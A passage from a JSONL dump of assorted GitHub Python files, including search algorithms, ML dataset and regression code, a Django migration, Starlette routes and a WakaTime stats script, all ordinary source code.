-1):\n if dp[i] == idx:\n result.append(A[i])\n idx -= 1\nprint(*result[::-1])","repo_name":"YOONJAHYUN/Python","sub_path":"BOJ/14002.py","file_name":"14002.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"2012105375","text":"#!/usr/bin/python3\n\n# echo \"For instance http://79.141.8.227:8000/xpfiles\"\n# echo \"or http://153.16.49.120:8000/xpfiles\"\n\nimport linux\nimport XPTest\nimport glob\nimport argparse\nimport sys\nimport os\nimport apt\nimport configparser\nimport lispmob\n#from configparser import ExtendedInterpolation\n\nglobal config\n\n\n\n# modes= {\n# \"install\" : \n# \"compile\" : \n# \"load\" : \n# \"unload\" : \"rmmod \"+lig_module+ \" 2>&1\" \n\n# }\n\n\nconfig = configparser.ConfigParser(interpolation=configparser.ExtendedInterpolation() )\n\ndef check_config( config_file):\n\t# TODO\n\t# check for pyroute, lispmob etc...\n\treturn False\n\n\t#if not os.path.is_file( config_file ):\n\n\n\n\n\n\ndef run_tests(args):\n\n\t#if args.run_tests:\n\n\t# TODO check test exists\n\tfor test_name in args.run_tests:\n\t\t# instantiate a test \n\t\tmembers = inspect.getmembers(sys.modules[\"XPTest\"], inspect.isclass)\n\t\tif not test_name in members:\n\t\t\tprint(\"Invalid test :\", test_name)\n\t\t\tcontinue\n\n\t\ttest = test_name();\n\t\tprint (\"Prelaunching operations\");\n\t\tif not test.prepare():\n\t\t\tprint ( \"Test '\"+ test.name + \"' failed\")\n\t\t\tcontinue;\n\n\t\ttest.launch()\n\n\n\n# config.set(\"DEFAULT\", \"MainDir\", os.path.realpath( os.path.dirname(__file__)) )\n\n# first need to compile module\nconfig.read(\"config.ini\")\n\n\n#available_tests = glob.glob(\"./tests/*.py\")\navailable_tests =('TCPWithoutLISP', 'MPTCPWithLisp','MPTCPWithoutLISP')\n\n# run tests\nparser = argparse.ArgumentParser(\n\t#description='Handle mptcp kernel module in charge of converting kernel requests into netlink requests '\n\tdescription='Will run tests you precise'\n\t)\n\n#there must be at most one ?\n# parser.add_argument('mode', choices=(\n# \t\t\t\t\t\t\t\t'download',\n# \t\t\t\t\t\t\t\t'compile',\n# \t\t\t\t\t\t\t\t'tests',\n# \t\t\t\t\t\t\t\t'daemon', \n# \t\t\t\t\t\t\t\t'module',\n# \t\t\t\t\t\t\t\t'kernel'\n# \t\t\t\t\t\t\t\t'mptcp'\n# \t\t\t\t\t\t\t\t), \n# \t\t\t\t\thelp=\"Choose what mode you wanna control\")\n\nsubparsers = parser.add_subparsers(dest=\"mode\", help='sub-command help')\ndaemon_parser = subparsers.add_parser('daemon',help='daemon help')\ndaemon_parser.add_argument('action', choices=('compile','load','unload'), action=\"store\")\ndaemon_parser.set_defaults(func=handle_daemon)\n\nmodule_parser = subparsers.add_parser('module', help='module help')\nmodule_parser.add_argument('action', choices=('compile','load','unload') )\nmodule_parser.set_defaults(func=handle_module)\n\ntests_parser = subparsers.add_parser('tests', help='tests help')\ntests_parser.add_argument('tests',nargs=\"*\")\ntests_parser.set_defaults(func=run_tests)\n\n# all params get passed to mptcp.py ?\nmptcp_parser = subparsers.add_parser('mptcp', help='tests help')\nmptcp_parser.add_argument('params',nargs=\"*\")\n\nlispmob_parser = subparsers.add_parser('lispmob', help='tests help')\nlispmob_parser.add_argument('action', choices=('compile','load','unload') )\nlispmob_parser.set_defaults(func=handle_lispmob)\n#mptcp_parser = subparsers.add_argument('') \n#parser.add_argument('--download',action=\"store_true\", help=\"will try to install everything necessary, to the extent of download and compiling from git\")\n#parser.add_argument('--compile-module',action=\"store_true\", help=\"recompile everything and install it\")\n#parser.add_argument('--module', choices=('load','unload') , action='store' , help = \"Use it to load or unload kernel module\" )\n\n#parser.add_argument('--run-tests',action=\"store_true\", help=\"Generate the random files that will be downloaded during the XP\")\n#parser.add_argument('--module', choices=('load','unload') ,action='store', dest='action' )\n\n\nparser.add_argument('--prepare',action=\"store_true\", help=\"Check the environment, recompile everything and install it\")\nparser.add_argument('--generate-files',action=\"store_true\", help=\"Generate the random files that will be downloaded during the XP\")\n\n# subparser for run-test command\n# we then need to know remote rloc and local rloc\n#parser_a = subparsers.add_parser('run-tests', help='a help')\n\n#parser.add_argument('--run-tests', nargs=\"+\", choices=available_tests , help=\"List of tests taken from the \\\"tests\\\" subfolder\");\n\n\n\n#nargs=argparse.REMAINDER\nargs = parser.parse_args( sys.argv[1:] )\n\nprint ( \"Chosen mode: \", args.mode );\nargs.func( args )\n\n\n# TO DEBUG\n#print(args)\n\n# if args.mode == \"module\":\n# \thandle_module( args.mode )\n#if args.daemon.action:\n\t# module = linux.InstalledModule( config['module']['name'])\n\t# if args.module == \"load\":\n\t# \tmodule.load()\n\t# else:\n\t# \tmodule.unload()\n\t# print (\"Module loaded \", module.is_loaded())\n\n# if args.download:\n# \tprint('Downloading complementary files')\n# \t# install libnl for\n# \t# subprocess.check_call(\"git clone git://git.infradead.org/users/tgr/libnl.git libnl\",shell=True)\n# \t# ./autogen.sh\n# \t# check swig and source-highlight/ascii docs are installed \n# \t# ./configure\n# \t# cd python \n# \t# python setup.py build\n# \t# sudo python setup.py install\n# \t# install custom lispmob\n# \t#\"git clone \"\n# \tprint('Finished')\n\n\n# compile module and install it\n# should generate files as well\nif args.prepare:\n\tkernel = linux.KernelSource( config['kernel']['src']);\n\t\n\tkernel.compile_module( config['module']['src'])\n\tkernel.install_module( config['module']['src'])\n\n\t# module = linux.InstalledModule( config['module']['name'])\n\t# module.load();\n\t# print (\"Module loaded \", module.is_loaded() )\n\t# #module.unload();\n\t# print (\"Module loaded \", module.is_loaded() )\n\n\n# will launch tests\n\n\n\n# uname -r\n\n# TODO need to set $MainDir\n#config.set()\n\n\n\n# will recompile module just to be sure\n# need to check kernel version against module version\n","repo_name":"teto/xp_couplage","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":5446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"13559132173","text":"#search\r\nimport state\r\nimport frontier\r\n\r\ndef search(n):\r\n s=state.create(n)\r\n # print(s)\r\n f=frontier.create(s)\r\n while not frontier.is_empty(f):\r\n s=frontier.remove(f)\r\n if state.is_target(s):\r\n return [s, f[1], f[3]]\r\n ns=state.get_next(s)\r\n for i in ns:\r\n frontier.insert(f,i)\r\n return 0\r\n\r\n# print(search(3))\r\n\r\ndef avg_search(times, n):\r\n sum_depth = 0\r\n sum_items = 0\r\n\r\n for i in range(times):\r\n _, items, depth = search(n)\r\n sum_depth += depth\r\n sum_items += items\r\n\r\n avg_depth = sum_depth / times\r\n avg_items = sum_items / times\r\n return avg_depth, avg_items\r\n\r\ndef avg_search_threading(times, n):\r\n from multiprocessing.pool import ThreadPool\r\n\r\n sum_depth = 0\r\n sum_items = 0\r\n\r\n with ThreadPool(8) as p:\r\n result = p.map(search, [n] * times)\r\n for i in result:\r\n _, items, depth = i\r\n sum_depth += depth\r\n sum_items += items\r\n\r\n avg_depth = sum_depth / times\r\n avg_items = sum_items / times\r\n return avg_depth, avg_items\r\n \r\n\r\nprint(\"--- Starting average search of 3 ---\")\r\ndepth3, items3 = avg_search_threading(100, 3)\r\nprint(\"Average depth\", depth3)\r\nprint(\"Average items\", items3)\r\n\r\nprint(\"--- Starting average search of 4 ---\")\r\ndepth4, items4 = avg_search_threading(100, 4)\r\nprint(\"Average depth\", depth4)\r\nprint(\"Average items\", items4)\r\n\r\n","repo_name":"AvielBerko/IntroToAI","sub_path":"תרגיל 1 - A star/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"12446424319","text":"# web user id and password\n\nimport urllib.request\nimport urllib.parse\n\nurl = 'http://localhost:8080/cgi-bin/web_user.py'\nvalues = {'name' : 'Michael Foord',\n 'location' : 'Northampton',\n 'language' : 'Python' }\n\ndata = urllib.parse.urlencode(values)\ndata = data.encode('ascii') # data should be bytes\nreq = urllib.request.Request(url, data)\nwith urllib.request.urlopen(req) as response:\n the_page = response.read()\n print(the_page)\n\n","repo_name":"amirkhan1092/Batch2023-24","sub_path":"Programs/Sequential Programs/web_user.py","file_name":"web_user.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"6"} +{"seq_id":"21986842996","text":"\"\"\"Fixer for 'g.throw(E(V).with_traceback(T))' -> 'g.throw(E, V, T)'\"\"\"\n\nfrom crosswind import fixer_base\nfrom crosswind.fixer_util import Comma\nfrom crosswind.pgen2 import token\nfrom crosswind.pytree import Leaf, Node\n\n\nclass FixThrow(fixer_base.BaseFix):\n\n PATTERN = \"\"\"\n power< any trailer< '.' 'throw' >\n trailer< '(' args=power< exc=any trailer< '(' val=any* ')' >\n trailer< '.' 'with_traceback' > trailer< '(' trc=any ')' > > ')' > >\n \"\"\"\n\n def transform(self, node, results):\n syms = self.syms\n exc, val, trc = (results[\"exc\"], results[\"val\"], results[\"trc\"])\n val = val[0] if val else Leaf(token.NAME, \"None\")\n val.prefix = trc.prefix = \" \"\n kids = [exc.clone(), Comma(), val.clone(), Comma(), trc.clone()]\n args = results[\"args\"]\n args.children = kids\n","repo_name":"ryanwersal/crosswind","sub_path":"fixer_suites/three_to_two/fixes/fix_throw.py","file_name":"fix_throw.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"6"} +{"seq_id":"42926774086","text":"\"\"\"\nhttps://leetcode-cn.com/explore/interview/card/top-interview-quesitons-in-2018/261/before-you-start/1107/\n给定一个大小为 n 的数组,找到其中的众数。众数是指在数组中出现次数大于 ⌊ n/2 ⌋ 的元素。\n\n你可以假设数组是非空的,并且给定的数组总是存在众数。\n\n示例 1:\n\n输入: [3,2,3]\n输出: 3\n示例 2:\n\n输入: [2,2,1,1,1,2,2]\n输出: 2\n\n--------------\nThinking:\n 摩尔投票法:充分利用了在数组中出现次数大于n/2的元素这一条件,时间复杂度O(n)\n 从第一个数开始,先令count=1,遇到相同的就加1,遇到不同的就减1,减到0就重新换下个数开始计数,到最后是哪个数,那么那个数就是众数。\n\"\"\"\nclass Solution(object):\n def majorityElement(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n major = nums[0]\n count = 1\n n = len(nums)\n del nums[0]\n for i in nums:\n if count == 0:\n count += 1\n major = i\n elif major == i:\n count += 1\n else:\n count -= 1\n return major\n ","repo_name":"ppalantir/axjingWorks","sub_path":"algorithm_note/getOffer/majorty_element.py","file_name":"majorty_element.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"20351285218","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('payments', '0002_auto_20161231_0914'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='landpurchasepayment',\n name='buyer_email',\n field=models.EmailField(default='', max_length=254),\n preserve_default=False,\n ),\n ]\n","repo_name":"njerucyrus/smartland","sub_path":"payments/migrations/0003_landpurchasepayment_buyer_email.py","file_name":"0003_landpurchasepayment_buyer_email.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"24646636869","text":"# USAGE\n#python 01_find_chars.py -i characters/bi.png -f y\n\nimport numpy as np\nimport argparse\nimport imutils\nimport cv2\n\nprint(\"01_find_chars.py --images images/imageName.png --saveFile y or n\")\n\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--image\", help = \"Where is the image file? path/filename\")\nap.add_argument(\"-f\", \"--saveFile\", help = \"Save contour points to file? y or n\")\nargs = vars(ap.parse_args())\noutFilename = args[\"image\"].split(\"/\")\n\nimage = cv2.imread(args[\"image\"])\n\n# find all the 'black' shapes in the image\nlower = np.array([0, 0, 0])\nupper = np.array([15, 15, 15])\nshapeMask = cv2.inRange(image, lower, upper)\n\ncnts = cv2.findContours(shapeMask.copy(), cv2.RETR_EXTERNAL,\n\tcv2.CHAIN_APPROX_SIMPLE)\ncnts = imutils.grab_contours(cnts)\n\nprint(\"I found {} black shapes\".format(len(cnts)))\n#cv2.imshow(\"Mask\", shapeMask)\n\n# loop over the contours\nk=1\nfor c in cnts:\n\tcv2.drawContours(image, [c], -1, (0, 255, 0), 2)\n\tcv2.imshow(\"Image\", image)\n\tcv2.waitKey(0)\n\tif args[\"saveFile\"] == \"y\":\n\t\tfilename = \"radicals/processed/\"+outFilename[1][:-4]+str(k)\n\t\tnp.save(filename, c)\n\t\tk+=1\n\n","repo_name":"NelsonPython/OpenCV-detects-Chinese-Radicals","sub_path":"01_find_chars.py","file_name":"01_find_chars.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"70472631547","text":"import os, sys\n\nfrom torch.utils.data import Dataset\nimport torchvision.transforms as transforms\nfrom scipy.interpolate import griddata\n\nimport glob\nimport numpy as np\nimport cv2\nimport torch\n\nfrom dataloader.utils import azimuthalAverage\nfrom PIL import Image, ImageEnhance\nimport copy\n\n\"\"\"\n Class for make dual (spatial and spectrum) image dataset\n\"\"\"\nclass SingleRGBStreamDataset(Dataset):\n def __init__(self, path, image_size, transform=None, shuffle=True):\n self.transform = transform\n self.image_size =image_size\n self.shuffle = shuffle\n self.data_path = path\n # print(\"sample: \", self.data_path[:10])\n # print(\"len: \", len(self.data_path))\n np.random.shuffle(self.data_path)\n self.indexes = range(len(self.data_path))\n self.on_epoch_end()\n\n def on_epoch_end(self):\n 'Updates indexes after each epoch'\n if self.shuffle == True:\n np.random.shuffle(self.data_path)\n \n def __getitem__(self, index):\n img = cv2.imread(self.data_path[index])\n img = cv2.cvtColor(img,cv2.COLOR_BGR2RGB)\n img = cv2.resize(img,(self.image_size,self.image_size))\n \n # Convert to PIL Image instance and transform spatial image\n PIL_img = Image.fromarray(img)\n if self.transform is not None:\n PIL_img = self.transform(PIL_img)\n \n ############ Make FFT image ############\n # Make label\n y = 0\n if '0_real' in self.data_path[index]:\n y = 0\n elif '1_df' in self.data_path[index] or '1_f2f' in self.data_path[index] or '1_fs' in self.data_path[index] or '1_nt' in self.data_path[index] or '1_fake' in self.data_path[index]:\n y = 1\n return PIL_img, y\n\n def __len__(self):\n return int(len(self.data_path))","repo_name":"phuc180155/GraduationThesis","sub_path":"my_thesis/forensics/dl_technique/dataloader/simple_dataset.py","file_name":"simple_dataset.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"12351618031","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 22 20:49:36 2022\n\n@author: th\n\"\"\"\n\nimport numpy as np\n\n# import ray\n\nimport random\nfrom sklearn.linear_model import LinearRegression \nfrom sklearn.ensemble import RandomForestRegressor\n\nfrom sklearn.preprocessing import StandardScaler as SS\n\n\ndef batch_split_x(nodes_cp, full_index, ii, chip_ids):\n nodes_cp = np.array(nodes_cp)\n test_x = nodes_cp[ii]\n train_idx=np.setxor1d(full_index, chip_ids)\n train_x = nodes_cp[train_idx]\n if(len(train_x[0].shape)==1):\n train_concat = flatten_list_1d(train_x)\n else:\n train_concat = []\n for jj, x in enumerate(train_x):\n if(jj==0):\n train_concat = x\n else:\n train_concat= np.vstack((train_concat, x))\n \n return train_concat, test_x\n\n\n\n\ndef flatten_list_1d(act_ratio):\n ph = np.empty((1,0))\n ph = np.squeeze(ph)\n \n for entry in act_ratio:\n ph = np.concatenate((ph, entry))\n \n return ph\n\n\ndef standardscaler_transform(sc_feat_pure):\n scaler = SS()\n scaler.fit(sc_feat_pure)\n transformed=scaler.transform(sc_feat_pure)\n \n return transformed, scaler\n\n\ndef average_mse_batch_x(target_frs, y_scale, chip_ids):\n mse_vec = []\n mse_train= []\n just_ave = []\n \n mae_vec = []\n mae_train= []\n just_ave_mae = []\n \n for ii in range(len(target_frs)):\n target_cp = np.copy(target_frs)\n full_index= np.arange(len(target_frs))\n\n \n test_x = target_cp[ii]\n #also take out configs belonging to the same chip \n same_chip = np.where(np.array(chip_ids) == chip_ids[ii])[0]\n train_idx=np.setxor1d(full_index, same_chip)\n train_x = target_cp[train_idx]\n \n # concat all train set\n train_x = flatten_list_1d(train_x)\n \n #standardize\n if(y_scale):\n train_x, train_scaler_x= standardscaler_transform(train_x.reshape(-1,1))\n test_x = train_scaler_x.transform(test_x.reshape(-1,1)) \n \n \n \n mean_train = np.mean(train_x)\n mse_loss = np.mean((test_x-mean_train)**2)\n mse_loss_tr = np.mean((train_x-mean_train)**2)\n mse_vec.append(mse_loss)\n mse_train.append(mse_loss_tr)\n mean_test = np.mean(test_x)\n mse_pure = np.mean(np.square(test_x-mean_test))\n just_ave.append(mse_pure)\n \n #mae\n mae_loss = np.mean(np.abs(test_x-mean_train))\n mae_loss_tr = np.mean(np.abs(train_x-mean_train))\n mae_vec.append(mae_loss)\n mae_train.append(mae_loss_tr)\n \n mean_test = np.mean(test_x)\n mae_pure = np.mean(np.abs(test_x-mean_test))\n just_ave_mae.append(mae_pure)\n \n ave_result = dict()\n ave_result['mse_test']= np.array(mse_vec)\n ave_result['mse_train']= np.array(mse_train)\n ave_result['mae_test']= np.array(mae_vec)\n ave_result['mae_train']= np.array(mae_train)\n \n \n return ave_result\n\n\ndef linear_reg_batch_x(nodes, target_frs, iter_n, y_scale, chip_ids):\n np.random.seed(42)\n random.seed(42)\n full_index= np.arange(len(target_frs))\n per_network = []\n for ii in range(len(target_frs)):\n \n ls_vec=[]\n lin_coef_vec=[]\n mse_vec=[]\n mae_vec=[]\n y_pred_vec = []\n ls_vec_t=[]\n mse_vec_t=[]\n mae_vec_t=[]\n #y_pred_vec_t = []\n #get target y first \n target_cp = np.copy(target_frs)\n full_index= np.arange(len(target_frs))\n test_y = target_cp[ii]\n #get idx from same chips \n same_chip = np.where(np.array(chip_ids) == chip_ids[ii])[0]\n \n train_idx=np.setxor1d(full_index, same_chip) # got rid of it\n \n train_y = target_cp[train_idx]\n train_y = flatten_list_1d(train_y)\n \n # make x \n nodes_cp = np.copy(nodes)\n train_x, test_x = batch_split_x(nodes_cp, full_index, ii, same_chip)\n \n train_x, train_scaler_x= standardscaler_transform(train_x)\n test_x = train_scaler_x.transform(test_x) \n \n if(y_scale):\n train_y, train_scaler_y=standardscaler_transform(train_y.reshape(-1,1))\n test_y = train_scaler_y.transform(test_y.reshape(-1,1)) \n \n \n for iter_ in range(iter_n):\n \n reg = LinearRegression().fit(train_x, train_y)\n linear_score = reg.score(train_x, train_y)\n linear_coef = reg.coef_\n y_pred=reg.predict(train_x)\n mseloss = np.mean(((train_y - y_pred) ** 2))\n maeloss = np.mean(np.abs(train_y-y_pred))\n \n ls_vec.append(linear_score)\n lin_coef_vec.append(linear_coef)\n mse_vec.append(mseloss)\n y_pred_vec.append(y_pred)\n mae_vec.append(maeloss)\n \n y_pred = reg.predict(test_x)\n mseloss= np.mean(((test_y - y_pred) ** 2))\n maeloss = np.mean(np.abs(test_y-y_pred))\n \n ls_vec_t.append(reg.score(test_x, test_y))\n mse_vec_t.append(mseloss)\n mae_vec_t.append(maeloss)\n # y_pred_vec_t.append(y_pred)\n \n\n \n \n lin_result = dict()\n lin_result['R-sq']=np.array(ls_vec)\n lin_result['slope_coef']=np.array(lin_coef_vec)\n lin_result['mse_train']=np.array(mse_vec)\n lin_result['mae_train'] = np.array(mae_vec)\n lin_result['pred']=y_pred_vec\n lin_result['R-sq test']= np.array(ls_vec_t)\n lin_result['mse_test'] = np.array(mse_vec_t)\n lin_result['mae_test'] = np.array(mae_vec_t)\n per_network.append(lin_result)\n \n return per_network\n\n\ndef rf_reg_batch_x(nodes, target_frs, iter_n, y_scale, chip_ids, params):\n np.random.seed(42)\n random.seed(42)\n full_index= np.arange(len(target_frs))\n per_network = []\n for ii in range(len(target_frs)):\n \n ls_vec = []\n mse_vec= []\n mae_vec=[]\n y_pred_vec=[]\n feat_imp_vec = []\n mse_test_vec=[]\n mae_test_vec=[]\n #y_pred_vec_t = []\n #get target y first \n \n \n #get target y first \n target_cp = np.copy(target_frs)\n full_index= np.arange(len(target_frs))\n test_y = target_cp[ii]\n #get idx from same chips \n same_chip = np.where(np.array(chip_ids) == chip_ids[ii])[0]\n train_idx=np.setxor1d(full_index, same_chip) # got rid of it\n \n train_y = target_cp[train_idx]\n train_y = flatten_list_1d(train_y)\n \n # make x \n nodes_cp = np.copy(nodes)\n train_x, test_x = batch_split_x(nodes_cp, full_index, ii, same_chip)\n train_x, train_scaler_x=standardscaler_transform(train_x)\n test_x = train_scaler_x.transform(test_x) \n \n \n \n if(y_scale):\n train_y, train_scaler_y=standardscaler_transform(train_y.reshape(-1,1))\n test_y = train_scaler_y.transform(test_y.reshape(-1,1)) \n train_y = np.squeeze(train_y)\n test_y = np.squeeze(test_y)\n \n for iter_ in range(iter_n):\n \n if(type(params)==bool):\n reg = RandomForestRegressor(\n n_estimators = 200,\n max_features = 'sqrt', \n min_samples_leaf = 5, \n min_samples_split = 2,\n )\n else:\n reg = RandomForestRegressor(n_estimators = params[ii]['rf__n_estimators'], \n # max_depth= params['max_depth'], \n max_features = params[ii]['rf__max_features'], \n min_samples_leaf = params[ii]['rf__min_samples_leaf'], \n min_samples_split = params[ii]['rf__min_samples_split'],\n )\n \n reg.fit(train_x, train_y)\n y_pred = reg.predict(train_x)\n mseloss = np.mean(((train_y - y_pred) ** 2))\n maeloss = np.mean(np.abs(train_y-y_pred))\n y_pred = reg.predict(test_x)\n mseloss_test = np.mean(((test_y - y_pred) ** 2))\n maeloss_test = np.mean(np.abs(test_y-y_pred)) \n feat_imp = reg.feature_importances_\n \n ls_vec.append(reg.score(train_x, train_y))\n mse_vec.append(mseloss)\n mae_vec.append(maeloss)\n y_pred_vec.append(y_pred)\n feat_imp_vec.append(feat_imp)\n mse_test_vec.append(mseloss_test)\n mae_test_vec.append(maeloss_test)\n \n\n \n#load_lr_model =pickle.load(open(filename, 'rb'))\n \n rf_result = dict()\n rf_result['reg_score']=np.array(ls_vec)\n rf_result['mse_train']=np.array(mse_vec)\n rf_result['y_pred']=np.array(y_pred_vec)\n rf_result['feat_importance']=feat_imp_vec\n rf_result['mse_test'] = np.array(mse_test_vec)\n rf_result['mae_train'] = np.array(mae_vec)\n rf_result['mae_test'] = np.array(mae_test_vec)\n per_network.append(rf_result)\n \n return per_network","repo_name":"arahangua/gnn_prediction_sn","sub_path":"pred_models/non_gnn_models.py","file_name":"non_gnn_models.py","file_ext":"py","file_size_in_byte":9344,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"34409053058","text":"import calendar\nimport time\nfrom sqlalchemy.dialects.postgresql import UUID\nfrom app.main.models.user import User\nfrom app.main.models.brands import Brand\n\nfrom app.main import db\n\n\nclass BrandContent(db.Model):\n __tablename__ = \"brand_articles\"\n\n id = db.Column(UUID(as_uuid=True), primary_key=True)\n title = db.Column(db.String(1000))\n description = db.Column(db.String(1000))\n user_id = db.Column(UUID(as_uuid=True), db.ForeignKey(\"users.id\"), nullable=True)\n brand_id = db.Column(UUID(as_uuid=True), db.ForeignKey(\"brands.id\"), nullable=True)\n canonical_link = db.Column(db.String(1000), nullable=False)\n image_link = db.Column(db.String(1000))\n content_type = db.Column(db.String(40))\n favicon_icon_link = db.Column(db.String(1000), nullable=True)\n updated_at = db.Column(db.BIGINT, nullable=False, default=calendar.timegm(time.gmtime()))\n created_at = db.Column(db.BIGINT, nullable=False, default=calendar.timegm(time.gmtime()))\n site_name = db.Column(db.String(200))\n tags = db.Column(db.PickleType,nullable=True)\n","repo_name":"deepakarya09/cureas_reads","sub_path":"app/main/models/brand_articles.py","file_name":"brand_articles.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"34892308986","text":"\nimport copy\nimport generals\nimport numpy as np\n\n\nDIRECTIONS = [\n (0, 1),\n (0, -1),\n (1, 0),\n (-1, 0),\n]\nOBSTACLES = [generals.MOUNTAIN, generals.OBSTACLE]\n\n\ndef get_all_moves(state):\n moves = []\n for y in range(state['rows']):\n for x in range(state['cols']):\n moves += get_moves(state, y, x)\n return moves\n\n\ndef get_moves(state, y, x):\n if (state['tile_grid'][y][x] != state['player_index']\n or state['army_grid'][y][x] < 2):\n return []\n\n moves = []\n for dy, dx in DIRECTIONS:\n by, bx = y + dy, x + dx\n if (0 <= by < state['rows']\n and 0 <= bx < state['cols']\n and state['tile_grid'][by][bx] not in OBSTACLES):\n moves.append((y, x, by, bx))\n return moves\n\n\ndef apply_move(state, move):\n state = copy.deepcopy(state)\n pi = state['player_index']\n ag = state['army_grid'] = np.asarray(state['army_grid'])\n tg = state['tile_grid'] = np.asarray(state['tile_grid'])\n if move is not None:\n ay, ax, by, bx = move\n assert abs(ay - by) + abs(ax - bx) == 1\n\n if (tg[ay, ax] == pi\n and tg[by, bx] not in OBSTACLES\n and ag[ay, ax] > 1):\n n = ag[ay, ax] - 1\n\n # neutral city or enemy tile\n if (((by, bx) in state['cities'] and tg[by, bx] == generals.EMPTY)\n or (tg[by, bx] >= 0 and tg[by, bx] != pi)):\n if n > ag[by, bx]:\n m = ag[by, bx]\n state['armies'][pi] -= m\n state['lands'][pi] += 1\n if tg[by, bx] >= 0:\n state['armies'][tg[by, bx]] -= m\n state['lands'][tg[by, bx]] -= 1\n ag[ay, ax] -= n\n ag[by, bx] = n - m\n tg[by, bx] = pi\n else:\n state['armies'][pi] -= n\n if tg[by, bx] >= 0:\n state['armies'][tg[by, bx]] -= n\n ag[ay, ax] -= n\n ag[by, bx] -= n\n\n # friendly tile\n elif tg[by, bx] == pi:\n ag[ay, ax] -= n\n ag[by, bx] += n\n\n # empty tile\n elif tg[by, bx] == generals.EMPTY:\n state['lands'][pi] += 1\n ag[ay, ax] -= n\n ag[by, bx] += n\n tg[by, bx] = pi\n\n else:\n raise AssertionError()\n\n # generate armies\n state['turn'] += 1\n if state['turn'] % 25 == 0:\n for p in np.unique(tg):\n if p >= 0:\n state['armies'][p] += (tg == p).sum()\n ag[tg >= 0] += 1\n else:\n for y, x in state['generals']:\n if y >= 0 and x >= 0:\n state['armies'][tg[y, x]] += 1\n ag[y, x] += 1\n for y, x in state['cities']:\n if tg[y, x] >= 0:\n state['armies'][tg[y, x]] += 1\n ag[y, x] += 1\n\n for i, (y, x) in enumerate(state['generals']):\n if y >= 0 and x >= 0 and tg[y, x] != i:\n state['alives'][i] = False\n\n return state\n","repo_name":"EklipZgit/generals-ai","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":3158,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"1206124937","text":"from starlette.routing import Host, Mount, Route, WebSocketRoute\n\nfrom . import endpoints, legacy, middleware, resources, settings\nfrom .reload import hotreload\nfrom .sitemap import sitemap\n\nroutes = [\n Host(\n \"florimondmanca.com\",\n app=legacy.DomainRedirect(\"florimond.dev\"),\n name=\"legacy:dot_com\",\n ),\n Host(\n \"blog.florimondmanca.com\",\n app=legacy.DomainRedirect(\"blog.florimond.dev\"),\n name=\"legacy:blog_dot_com\",\n ),\n Host(\n \"blog.florimond.dev\",\n app=legacy.DomainRedirect(\"florimond.dev\", root_path=\"/blog\"),\n name=\"legacy:blog_dot_dev\",\n ),\n Route(\"/\", endpoints.home),\n Route(\"/error/\", endpoints.error),\n Route(\"/blog/\", endpoints.legacy_blog_home, name=\"legacy:blog_home\"),\n Route(\"/blog/{permalink:path}/\", endpoints.RenderPage, name=\"page\"),\n Mount(settings.STATIC_ROOT, resources.static, name=\"static\"),\n # These files need to be exposed at the root, not '/static/'.\n Route(\"/favicon.ico\", resources.static, name=\"favicon\"),\n Route(\"/robots.txt\", resources.static, name=\"robots\"),\n Route(\"/sitemap.xml\", sitemap, name=\"sitemap\"),\n Route(\n \"/feed.rss\",\n # Make sure clients always receive the correct MIME type for the RSS feed,\n # as the content type Starlette guesses may vary across operating systems.\n middleware.PatchHeadersMiddleware(\n resources.static, headers={\"content-type\": \"application/rss+xml\"}\n ),\n name=\"feed-rss\",\n ),\n]\n\nif settings.DEBUG: # pragma: no cover\n routes += [WebSocketRoute(\"/hot-reload\", hotreload, name=\"hot-reload\")]\n","repo_name":"1akshat/www","sub_path":"server/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"6"} +{"seq_id":"70613777787","text":"import requests\nimport datetime\nimport os\nimport base64\nimport json\nfrom dotenv import load_dotenv\n\nload_dotenv()\nAPI_KEY = os.getenv(\"API_KEY\")\nENCODED_API_KEY = base64.b64encode(API_KEY.encode()).decode()\nheaders = {\n 'Authorization': f'Basic {ENCODED_API_KEY}'}\ndef get_daily_stats():\n \n params = {\n # 'date': date\n }\n response = requests.get('https://wakatime.com/api/v1/users/current/status_bar/today', headers=headers, params=params)\n \n #print(response.status_code)\n #print(response.json())\n \n if response.status_code == 200:\n data = response.json()\n if 'data' in data:\n total_seconds = data['data']['grand_total']['total_seconds']\n hours = total_seconds // 3600\n minutes = (total_seconds % 3600) // 60\n date = data['data']['range']['date']\n print(f\"Total coding time on {date}: {hours} hours {minutes} 